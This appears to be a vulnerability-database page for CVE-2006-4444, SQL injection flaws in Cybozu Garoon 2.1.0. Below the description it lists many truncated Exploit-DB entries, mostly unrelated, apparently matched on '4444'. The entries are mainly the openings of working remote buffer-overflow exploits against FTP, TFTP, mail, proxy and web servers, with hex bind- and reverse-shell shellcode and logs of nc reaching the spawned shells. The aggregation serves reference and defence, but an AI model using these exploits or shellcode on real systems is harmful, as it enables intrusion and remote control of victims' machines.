CVE-2006-4444
published 2006-08-29CVE-2006-4444: Multiple SQL injection vulnerabilities in Cybozu Garoon 2.1.0 for Windows allow remote authenticated users to execute arbitrary SQL commands via the (1) tid…
PriorityP335medium6.5CVSS 2.0
AVNACLAuSCPIPAP
EXPLOIT
EPSS
2.85%
84.9th percentile
Multiple SQL injection vulnerabilities in Cybozu Garoon 2.1.0 for Windows allow remote authenticated users to execute arbitrary SQL commands via the (1) tid parameter in the (a) todo/view (aka TODO List View), (b) todo/modify (aka TODO List Modify), or (c) todo/delete functionality; the (2) pid parameter in the (d) workflow/view or (e) workflow/print functionality; the (3) uid parameter in the (f) schedule/user_view, (g) phonemessage/add, (h) phonemessage/history, or (i) schedule/view functionality; the (4) cid parameter in (j) todo/index; the (5) iid parameter in the (k) memo/view or (l) memo/print functionality; or the (6) event parameter in the (m) schedule/view functionality.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cybozu | garoon | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
RealVNC 4.1.0/4.1.1 - Authentication Bypass
exploitdb·2012-05-13·CVSS 7.5
CVE-2006-2369 [HIGH] RealVNC 4.1.0/4.1.1 - Authentication Bypass
RealVNC 4.1.0/4.1.1 - Authentication Bypass
---
# Exploit Title: RealVNC 4.1.0 and 4.1.1 Authentication Bypass Exploit
# Date: 2012-05-13
# Author: @fdiskyou
# e-mail: rui at deniable.org
# Version: 4.1.0 and 4.1.1
# Tested on: Windows XP
# CVE: CVE-2006-2369
# Requires vncviewer installed
# Basic port of hdmoore/msf2 perl version to python for fun and profit (ease of use)
import select
import thread
import os
import socket
import sys, re
BIND_ADDR = '127.0.0.1'
BIND_PORT = 4444
def pwn4ge(host, port):
socket.setdefaulttimeout(5)
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
server.connect((host, port))
except socket.error, msg:
print '[*] Could not connect to the target VNC service. Error code: ' + str(msg[0]) + ' , Error message : ' + msg[1]
sys.exit();
else:
hello
Exploit-DB
Golden FTP Server 4.70 - 'PASS' Buffer Overflow
exploitdb·2011-01-23
CVE-2006-6576 Golden FTP Server 4.70 - 'PASS' Buffer Overflow
Golden FTP Server 4.70 - 'PASS' Buffer Overflow
---
#GoldenFTP 4.70 PASS Exploit
#Authors: Craig Freyman (cd1zz) and Gerardo Iglesias Galvan (iglesiasgg)
#Tested on XP SP3
#Vendor Contacted: 1/17/2011 (no response)
#For this exploit to work correctly, you need to know the subnet that the server
#is running on. You also need to make sure that "show new connections" is checked in the options.
#The total length of the buffer should be 4 bytes less than the offset, with EIP at the end.
#528 is the offset when server running on 192.168.236.0
#533 is the offset when server running on 10.0.1.0
#530 is the offset when server running on 192.168.1.0
#531 is the offset when server running on 172.16.1.0
require 'net/ftp'
#Metasploit bind shell port=4444 | shikata_ga_nai | 369 bytes
shellcode = ("\
Exploit-DB
TFTP Server 1.4 - ST Buffer Overflow
exploitdb·2008-03-26
CVE-2008-1611 TFTP Server 1.4 - ST Buffer Overflow
TFTP Server 1.4 - ST Buffer Overflow
---
#!/usr/bin/python
# TFTP Server for Windows V1.4 ST (0day)
# http://sourceforge.net/projects/tftp-server/
# Tested on Windows Vista SP0.
# Coded by Mati Aharoni
# muts..at..offensive-security.com
# http://www.offensive-security.com/0day/sourceforge-tftpd.py.txt
##################################################################
# bt ~ # sourceforge-tftpd.py
# [*] TFTP Server for Windows V1.4 ST (0day)
# [*] http://www.offensive-security.com
# [*] Sending evil packet, ph33r
# [*] Check port 4444 for bindshell
# bt ~ # nc -v 172.16.167.134 4444
# (UNKNOWN) [172.16.167.134] 4444 (krb524) open
# Microsoft Windows [Version 6.0.6000]
# Copyright (c) 2006 Microsoft Corporation. All
# rights reserved.
#
# C:\Windows\system32>
##############################
Exploit-DB
eXtremail 2.1.1 - PLAIN Authentication Remote Stack Overflow
exploitdb·2007-10-15
CVE-2007-5467 eXtremail 2.1.1 - PLAIN Authentication Remote Stack Overflow
eXtremail 2.1.1 - PLAIN Authentication Remote Stack Overflow
---
/* extremail-v6.c
*
* Copyright (c) 2006 by
*
* eXtremail
#include
#include
#include
#include
#include
#define BUF_SIZE 2048
#define BBUF_SIZE BUF_SIZE/3*4+1
#define NOP 0x41
#define AUTH_CMD "1 AUTHENTICATE PLAIN\n"
#define DEF_PORT 143
#define PORT_IMAPD DEF_PORT
#define PORT_SHELL 4444
static const char movshell_lnx[] =
"\x8b\x44\x24\x08" /* mov 0x08(%esp),%eax */
"\x40" /* inc %eax */
"\xff\xe0"; /* jmp *%eax */
static const char bndshell_lnx[] =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
"\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
"\x
Exploit-DB
eXtremail 2.1.1 - 'LOGIN' Remote Stack Overflow
exploitdb·2007-10-15
CVE-2007-5467 eXtremail 2.1.1 - 'LOGIN' Remote Stack Overflow
eXtremail 2.1.1 - 'LOGIN' Remote Stack Overflow
---
/* extremail-v4.c
*
* Copyright (c) 2006 by
*
* eXtremail
#include
#include
#include
#include
#include
#define BUF_SIZE 8192
#define NOP 0x41
#define PAD 0 /* do you feel lucky? */
#define DEF_PORT 4501
#define PORT_ADMIN DEF_PORT
#define PORT_SHELL 4444
static const char bndshell_lnx[] =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
"\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
"\x89\xe1\xcd\x80";
#define NUM_TARGETS 2
struct target_t
{
const char *name;
const int len;
const char *zshell;
co
Exploit-DB
Snort 2.6.1 (Linux) - DCE/RPC Preprocessor Remote Buffer Overflow
exploitdb·2007-03-30·CVSS 10.0
CVE-2006-5276 [CRITICAL] Snort 2.6.1 (Linux) - DCE/RPC Preprocessor Remote Buffer Overflow
Snort 2.6.1 (Linux) - DCE/RPC Preprocessor Remote Buffer Overflow
---
#!/usr/bin/python
#
# Remote exploit for Snort DCE/RPC preprocessor vulnerability as described in
# CVE-2006-5276. The exploit binds a shell to TCP port 4444 and connects to it.
# This code was tested against snort-2.6.1 running on Red Hat Linux 8
#
# Author shall bear no responsibility for any screw ups caused by using this code
# Winny Thomas :-)
import os
import sys
import time
from scapy import *
# Linux portbind shellcode; Binds shell on TCP port 4444
shellcode = "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
shellcode += "\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
shellcode += "\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
shellcode += "\xb0\x66\xcd
Exploit-DB
Easy File Sharing FTP Server 2.0 (Windows 2000 SP4) - 'PASS' Remote Overflow
exploitdb·2007-03-26
CVE-2006-3952 Easy File Sharing FTP Server 2.0 (Windows 2000 SP4) - 'PASS' Remote Overflow
Easy File Sharing FTP Server 2.0 (Windows 2000 SP4) - 'PASS' Remote Overflow
---
#!/usr/bin/python
# Remote exploit for Easy File Sharing FTP server V2.0. The vulnerability
# was discovered by h07 and a POC for windows XP SP2 (polish version) was
# provided. This exploit was tested on windows 2000 server SP4. The exploit
# binds a shell on TCP port 4444.
#
# Author shall bear no responsibility for any screw ups
# Winny Thomas :-)
import os
import sys
import time
import struct
import socket
shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
shellcode += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
shellcode += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42
Exploit-DB
Helix Server 11.0.1 (Windows 2000 SP4) - Remote Heap Overflow
exploitdb·2007-03-21
CVE-2006-6026 Helix Server 11.0.1 (Windows 2000 SP4) - Remote Heap Overflow
Helix Server 11.0.1 (Windows 2000 SP4) - Remote Heap Overflow
---
#/usr/bin/python
# Remote exploit for the vulnerability in Helix server v11.0.1 as described
# at http://gleg.net/helix.txt
#
# The exploit spawns a shell on TCP port 4444 and connects to it. At the time of
# overflow we control EAX which is used in a call as follows
# 00420C64: call dword ptr [eax + 4]
# ECX points into our buffer at the time of overflow. So if we can craft a DWORD
# that points to an address that translates to call dword ptr [ecx + xx] and
# have a pointer into our shellcode at that location then our shellcode executes
# Yes, a lot of indirection here :-). This exploit uses hardcoded address which
# worked fine on Windows 2000 server SP4 machines I have in my test lab. You may
# have to tweak it for your
Exploit-DB
CA BrightStor ARCserve - 'msgeng.exe' Remote Stack Overflow
exploitdb·2007-03-16
CVE-2006-5143 CA BrightStor ARCserve - 'msgeng.exe' Remote Stack Overflow
CA BrightStor ARCserve - 'msgeng.exe' Remote Stack Overflow
---
#!/usr/bin/python
# This one was listed in the SANS TOP 20 and I needed an exploit for analysis.
# I couldnt find a reliable exploit for my analysis and so came up with this.
# Remote exploit for the CA BrightStor msgeng.exe service stack overflow
# vulnerability as described in LS-20060330.pdf on lssec.com. The exploit was
# tested on windows 2000 SP4 in a VMware environment.
# Opens a shell on TCP port 4444.
#
# Though a stack overflow vulnerability caused due to strcpy, this vulnerability
# provides an interesting case. Unlike a traditional stack overflow where the
# user supplies the overflow data which immediately is copied into a stack
# based buffer, here the user supplied data is stored in the heap and the first
# DW
Exploit-DB
3Com TFTP Service (3CTftpSvc) 2.0.1 - Long Transporting Mode
exploitdb·2007-02-28
CVE-2006-6183 3Com TFTP Service (3CTftpSvc) 2.0.1 - Long Transporting Mode
3Com TFTP Service (3CTftpSvc) 2.0.1 - Long Transporting Mode
---
#!/usr/bin/perl -w
# ===============================================================================================
# 3Com TFTP Service \n\n";
exit;
}
$target = IO::Socket::INET->new(Proto=>'udp',
PeerAddr=>$ARGV[0],
PeerPort=>$ARGV[1])
or die "Cannot connect to $ARGV[0] on port $ARGV[1]";
# win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
my($shellcode)=
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x48".
"\xc8\xb3\x54\x83\xeb\xfc\xe2\xf4\xb4\xa2\x58\x19\xa0\x31\x4c\xab".
"\xb7\xa8\x38\x38\x6c\xec\x38\x11\x74\x43\xcf\x51\x30\xc9\x5c\xdf".
"\x07\xd0\x38\x0b\x68\xc9\x58\x1d\xc3\xfc\x38\x55\xa6\xf9\x73\xcd".
"\xe4\x4c\x73\x20\x4f\x09\x79\x59\x49\x0a\x58\xa0\x73\x9
Exploit-DB
ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (1)
exploitdb·2007-01-15
CVE-2006-4948 ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (1)
ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (1)
---
#!/usr/bin/perl -w
use IO::Socket;
if(!($ARGV[1]))
{
print "Usage: tftpdwin-0-4-2.pl \n\n";
exit;
}
$victim = IO::Socket::INET->new(Proto=>'udp',
PeerAddr=>$ARGV[0],
PeerPort=>$ARGV[1])
or die "Cannot connect to $ARGV[0] sulla porta $ARGV[1]";
my $nop0="\x90"x15;
#8BC3 MOV EAX,EBX
#66:05 1201 ADD AX,112
#50 PUSH EAX
#C3 RETN
my $asm="\x8b\xc3\x66\x05\x12\x01\x50\xc3";
my $nop="\x90"x57;
my $nop1="\x90"x7;
my $eip="\x42\xfb\x61\x40";# pop ebp,ret in tftpd.exe
#my $eip="B"x4;
#A binary translation of NGS Writing Small Shellcode by Dafydd Stuttard with only two little differences
#1)bind port, in this exploit is 4444 in the original shellcode was 6666
#2)4 bytes added to the shellcode in order not to see the win
Exploit-DB
QK SMTP 3.01 - 'RCPT TO' Remote Buffer Overflow (2)
exploitdb·2007-01-01
CVE-2006-5551 QK SMTP 3.01 - 'RCPT TO' Remote Buffer Overflow (2)
QK SMTP 3.01 - 'RCPT TO' Remote Buffer Overflow (2)
---
#!/bin/perl
#
#https://www.securityfocus.com/bid/20681
#
# tested on winXp Pro SP0 English/winXp Pro SP2 Italian/win 2k SP4 Italian/English return address is universal
# bind a remote cmd.exe on target host on 4444 port; based on expanders original exploit
# credit to Greg Linares for discovered the vulnerability
# thanks to hdm and vlads902 for original shellcode;encoded using Skylined alpha2 tool
# Jacopo Cervini aka acaro [at] jervus.it
if (@ARGV new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$request = "helo acaro" . "\r\n";
send $socket, $request, 0;
print "[+] Sent helo request\n";
recv($socket, $reply, 1024, 0);
Exploit-DB
3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Remote Overflow
exploitdb·2006-11-30
CVE-2006-6183 3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Remote Overflow
3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Remote Overflow
---
# 3comtftpd_xpsp2.rb
#
# Copyright (C) cthulhu
#
#
# This is a poc intended to exploit the 3Com TFTP Service version 2.0.1
# long transporting mode buffer overflow under xp sp2 english
# (Vulnerability discovered by Liu Qixu)
#
# Usage :
# ruby 3comftpd_xpsp2.rb
# Default port is 69 if not specified
require 'socket'
# win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
sc1 = "\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x02"
sc1 += "\xaf\xbb\x16\x83\xeb\xfc\xe2\xf4\xfe\xc5\x50\x5b\xea\x56\x44\xe9"
sc1 +="\xfd\xcf\x30\x7a\x26\x8b\x30\x53\x3e\x24\xc7\x13\x7a\xae\x54\x9d"
sc1 +="\x4d\xb7\x30\x49\x22\xae\x50\x5f\x89\x9b\x30\x17\xec\x9e\x7b\x8f"
sc1 +="\x
Exploit-DB
WinZip 10.0.7245 - FileView ActiveX Remote Buffer Overflow
exploitdb·2006-11-15
CVE-2006-6884 WinZip 10.0.7245 - FileView ActiveX Remote Buffer Overflow
WinZip 10.0.7245 - FileView ActiveX Remote Buffer Overflow
---
/* WinZip
*
* - prdelka
*/
#include
#include
#include
#include
#include
#include
#include
#define NOPSIZE 999999
struct target {
char* name;
int retaddr;
};
struct shellcode {
char* name;
short port;
int host;
char* shellcode;
};
int targetno = 1;
struct target targets[] = {
{"WinXP SP2(en) WinZIP 10.0.6667",0x02DA3269}
/* IE 6.0.2900.2180.xp_sp2_gdr.050301-1519 WZ 10.0(6667)" */
};
int shellno = 2;
struct shellcode shellcodes[] = {
{"Win32 x86 bind() shellcode (4444/tcp default)",162,-1,
"\x48\x40\xf5\x49\xd6\x4a\xf9\x91\x47\x96\x2f\xf8\x9b\x37\x41\xf5"
"\x99\x47\xf9\xf9\xfc\xf9\x48\x4e\x4b\x9b\x90\x9b\xf5\x97\x40\xf9"
"\xd6\x41\xf9\x48\x9b\x92\xfd\x9b\x49\x42\x4f\x9f\x90\xd6\x27\x9b"
"\x93\x46\x2f\x90\xfd\x4a\x6a\x51
Exploit-DB
NaviCOPA Web Server 2.01 - 'GET' Remote Buffer Overflow
exploitdb·2006-09-27
CVE-2006-5112 NaviCOPA Web Server 2.01 - 'GET' Remote Buffer Overflow
NaviCOPA Web Server 2.01 - 'GET' Remote Buffer Overflow
---
/*
navi_exp.c
NaviCOPA Web Server 2.01 0day Remote Buffer Overflow Exploit
Coded by h07
Tested on XP SP2 Polish, 2000 SP4 Polish
Example:
C:\>navi_exp 192.168.0.1 0
[*] NaviCOPA Web Server 2.01 0day Remote Buffer Overflow Exploit
[*] Coded by h07
[+] Sending buffer: OK
[*] Check your shell on 192.168.0.1:4444
[*] Press enter to quit
C:\>nc -v 192.168.0.1 4444
[192.168.0.1] 4444 (?) open
Microsoft Windows XP [Wersja 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\windows\system32>
*/
#include
#define PORT 80
#define BUFF_SIZE 1024
typedef struct
{
char os_name[32];
unsigned long ret;
} target;
char shellcode[] =
/*
Win32_bind shellcode
Encoder: PexFnstenvMov
Bad chars: 0x00 0x20 0x0a 0x0d 0x2f 0x3f
Thx metasploit.c
Exploit-DB
Ipswitch WS_FTP LE 5.08 - PASV Response Remote Buffer Overflow
exploitdb·2006-09-20
CVE-2006-4974 Ipswitch WS_FTP LE 5.08 - PASV Response Remote Buffer Overflow
Ipswitch WS_FTP LE 5.08 - PASV Response Remote Buffer Overflow
---
/*
ws_exp.c
WS_FTP LE 5.08 (PASV response) 0day buffer overflow exploit
Coded by h07
Tested on XP SP2 Polish, 2000 SP4 Polish
Example:
C:\>ws_exp 1 192.168.0.1 4444
[*] WS_FTP LE 5.08 (PASV response) 0day buffer overflow exploit
[*] Coded by h07
[+] Listening on 21
[+] Connection accepted from 192.168.0.3
[+] Client request: USER h07
[+] Client request: PWD
[+] Client request: SYST
[+] Client request: HELP
[+] Client request: PASV
[+] Sending buffer: OK
[*] Press enter to quit
C:\>nc -v -l -p 4444
listening on [any] 4444 ...
connect to [192.168.0.1] from (UNKNOWN) [192.168.0.3] 2809: NO_DATA
Microsoft Windows 2000 [Wersja 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\Program Files\WS_FTP>
*/
#include
#define
Exploit-DB
Mercur MailServer 5.0 SP3 - 'IMAP' Remote Buffer Overflow (2)
exploitdb·2006-09-11
CVE-2006-1255 Mercur MailServer 5.0 SP3 - 'IMAP' Remote Buffer Overflow (2)
Mercur MailServer 5.0 SP3 - 'IMAP' Remote Buffer Overflow (2)
---
#!/usr/bin/perl
# Tested on Windows 2k Sp4 Italian and English version and Win XP Pro SP2 Italian and English #version
# Perl script based on Sami FTP server remote exploit by Critical Security
# https://www.securityfocus.com/bid/17138
# acaro [at] jervus.it
use IO::Socket::INET;
use Switch;
if (@ARGV new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$exploit = "a001 LOGIN " . $pad. $eip .$shellcode."\r\n";
send $socket, $exploit, 0;
print "[+] sending 1st chunk\n";
$exploit = "a001 LOGIN " . $pad. $eip ."\r\n";
send $socket, $exploit, 0;
print "[+] sending 2nd chunk\n";
print " + connecting port 4444 of $host
Exploit-DB
Streamripper 1.61.25 - HTTP Header Parsing Buffer Overflow (2)
exploitdb·2006-08-29
CVE-2006-3124 Streamripper 1.61.25 - HTTP Header Parsing Buffer Overflow (2)
Streamripper 1.61.25 - HTTP Header Parsing Buffer Overflow (2)
---
/*
* name: streamripper exploit.exe 80 0
* [ public-release ]
* streamripper streamripper.exe http://127.0.0.1:80
* Connecting...
*
* on other shell
* [+] client conneted!
* [+] exploit send check shell on port 4444
*
* now connect to 127.0.0.1:4444
*/
/* #define _WIN32 */
#include
#include
#include
#ifdef _WIN32
#include
#pragma comment(lib, "ws2_32")
#else
#include
#include
#include
#endif
/* portbind shellcode port 4444*/
unsigned char portbindsc[] =
"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xaf"
"\xbf\xf8\x2a\x83\xeb\xfc\xe2\xf4\x53\xd5\x13\x67\x47\x46\x07\xd5"
"\x50\xdf\x73\x46\x8b\x9b\x73\x6f\x93\x34\x84\x2f\xd7\xbe\x17\xa1"
"\xe0\xa7\x73\x75\x8f\xbe\x13\x63\x24\x8b\x73\x2b\x41\x8e\x38\xb3"
"
Exploit-DB
Cybuzu Garoon 2.1.0 - Multiple SQL Injections
exploitdb·2006-08-28
CVE-2006-4444 Cybuzu Garoon 2.1.0 - Multiple SQL Injections
Cybuzu Garoon 2.1.0 - Multiple SQL Injections
---
Cybozu Garoon 2 SQL Injection Vulnerabilities
by Tan Chew Keong
Release Date: 2006-08-28
Summary
Some SQL injection vulnerabilities have been found in Cybozu Garoon 2. When exploited by a logon user,
the vulnerabilities allow manipulation of SQL statements which can lead to disclosure of information
from the database, or to cause the backend MySQL database to consume large amount of CPU resources.
Tested Versions
Cybuzu Garoon 2 Version 2.1.0 for Windows
Details
This advisory discloses several SQL injection vulnerabilities in Cybozu Garoon 2.
1) TODO List View/Modify SQL Injection Cybuzu Garoon 2 does not properly sanitise the "tid" parameter
in the TODO List View and Modify functionality. It is possible for a logon user to exploit
Exploit-DB
Texas Imperial Software WFTPD 3.23 - 'SIZE' Remote Buffer Overflow
exploitdb·2006-08-21
CVE-2006-4318 Texas Imperial Software WFTPD 3.23 - 'SIZE' Remote Buffer Overflow
Texas Imperial Software WFTPD 3.23 - 'SIZE' Remote Buffer Overflow
---
/*
* wftpd_exp.c
* WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit
* coded by h07
* tested on XP SP2 polish, 2000 SP4 polish
* example..
C:\>wftpd_exp 0 0 192.168.0.2 h07 open 192.168.0.1 4444
[*] WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit
[*] coded by h07
[*] FTP response: 331 Give me your password, please
[*] FTP response: 230 Logged in successfully
[+] sending buffer: ok
[*] press enter to quit
C:\>nc -l -p 4444
Microsoft Windows XP [Wersja 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\wftpd323>
*/
#include
#include
#define BUFF_SIZE 1024
#define PORT 21
//win32 reverse shellcode (metasploit.com)
char shellcode[] =
"\x31\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x
Exploit-DB
eIQnetworks License Manager - Remote Buffer Overflow (multi) (1)
exploitdb·2006-07-27
CVE-2006-3838 eIQnetworks License Manager - Remote Buffer Overflow (multi) (1)
eIQnetworks License Manager - Remote Buffer Overflow (multi) (1)
---
#!/usr/bin/perl -w
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com) - 03/23/2006
# Bug found by Titon of Bastard Labs.
#
# http://www.zerodayinitiative.com/advisories/ZDI-06-024.html
#
# Exploit for * Security Analyzer by eiQnetworks (OEM for Several vendors)
#
# kfinisterre@kfinisterre01:~$ ./eiQ_multi.pl 2 192.168.0.13
# *** Target: NetworkSecurityAnalyzerv4.2.27.exe, Len: 1262
# Exploiting 192.168.0.13
# kfinisterre@kfinisterre01:~$ telnet 192.168.0.13 4444
# Trying 192.168.0.13...
# Connected to 192.168.0.13.
# Escape character is '^]'.
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Network Security Analyzer\fwa>exit
#
Exploit-DB
WinRAR 3.60 Beta 6 (French) - SFX Path Local Stack Overflow
exploitdb·2006-07-07
CVE-2006-3912 WinRAR 3.60 Beta 6 (French) - SFX Path Local Stack Overflow
WinRAR 3.60 Beta 6 (French) - SFX Path Local Stack Overflow
---
"""
WinRAR - Stack Overflows in SelF - eXtracting Archives
Tested Version(s)..: WinRAR 3.60 beta 4
Original Author.............: posidron
Shellcode Stuffing .........: muts
XP SP2 French return address : JA
"""
import os, sys
winrar__ = 'C:\WinRAR.exe'
sfxnfo__ = "comment.txt"
result__ = "sample.exe"
# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com */
sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
sc +="\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
sc +="\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
sc +="\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
sc +="\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x
Exploit-DB
WinRAR 3.60 Beta 6 - SFX Path Local Stack Overflow
exploitdb·2006-07-05
CVE-2006-3912 WinRAR 3.60 Beta 6 - SFX Path Local Stack Overflow
WinRAR 3.60 Beta 6 - SFX Path Local Stack Overflow
---
"""
WinRAR - Stack Overflows in SelF - eXtracting Archives
Tested Version(s)..: WinRAR 3.60 beta 4
Original Author.............: posidron
Shellcode Stuffing .........: muts
"""
import os, sys
winrar__ = 'C:\WinRAR.exe'
sfxnfo__ = "comment.txt"
result__ = "sample.exe"
# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com */
sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
sc +="\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
sc +="\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
sc +="\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
sc +="\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
sc +="\x4d\x34\x
Exploit-DB
QBik WinGate WWW Proxy Server 6.1.1.1077 - 'POST' Remote Buffer Overflow
exploitdb·2006-06-07
CVE-2006-2926 QBik WinGate WWW Proxy Server 6.1.1.1077 - 'POST' Remote Buffer Overflow
QBik WinGate WWW Proxy Server 6.1.1.1077 - 'POST' Remote Buffer Overflow
---
### *** Proof of concept (not for "in the wild" kiddies) ***
### QBik Wingate version 6.1.1.1077 remote exploit for Win2k SP4 (german)
### by kcope in 2006
###
use IO::Socket;
if ($ARGV[0] eq "")
{
print "param1 = remote host";
exit;
}
# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e".
"\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f
Exploit-DB
BomberClone < 0.11.6.2 - Error Messages Remote Buffer Overflow
exploitdb·2006-03-22·CVSS 7.5
CVE-2006-0460 [HIGH] BomberClone < 0.11.6.2 - Error Messages Remote Buffer Overflow
BomberClone
#include
#include
#include
#include
#include
#include
#include
/* fork() + bind() port 31337 - ty izik */
char linux_shellcode[]=
"\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02\x89\xe1\xcd\x80"
"\x5b\x5d\x52\x66\xbd\x69\x7a\x0f\xcd\x09\xdd\x55\x6a\x10\x51"
"\x50\x89\xe1\xb0\x66\xcd\x80\xb3\x04\xb0\x66\xcd\x80\x5f\x50"
"\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80\x93\xb0\x02\xcd\x80\x85\xc0"
"\x75\x1a\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73"
"\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\xeb\xb2\x6a\x06\x58"
"\xcd\x80\xb3\x04\xeb\xc9";
/* bind shell to 4444 - metasploit */
char win32_shellcode[] =
"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x36"
"\xbc\x74\xb1\x83\xeb\xfc\xe2\xf4\xca\xd6\x9f\xfc\xde\x45\x8b\x4e"
"\xc9\xdc\xff\xdd\x12\x98\xff\xf4\x0a\x37\x08
No writeups or analysis indexed.
http://cybozu.co.jp/products/dl/notice_060825/http://secunia.com/advisories/21664http://vuln.sg/cybozugaroon-en.htmlhttp://www.osvdb.org/28361http://www.osvdb.org/28362http://www.osvdb.org/28363http://www.osvdb.org/28364http://www.osvdb.org/28365http://www.osvdb.org/28366http://www.securityfocus.com/bid/19731http://www.vupen.com/english/advisories/2006/3399https://exchange.xforce.ibmcloud.com/vulnerabilities/28594http://cybozu.co.jp/products/dl/notice_060825/http://secunia.com/advisories/21664http://vuln.sg/cybozugaroon-en.htmlhttp://www.osvdb.org/28361http://www.osvdb.org/28362http://www.osvdb.org/28363http://www.osvdb.org/28364http://www.osvdb.org/28365http://www.osvdb.org/28366http://www.securityfocus.com/bid/19731http://www.vupen.com/english/advisories/2006/3399https://exchange.xforce.ibmcloud.com/vulnerabilities/28594
2006-08-29
Published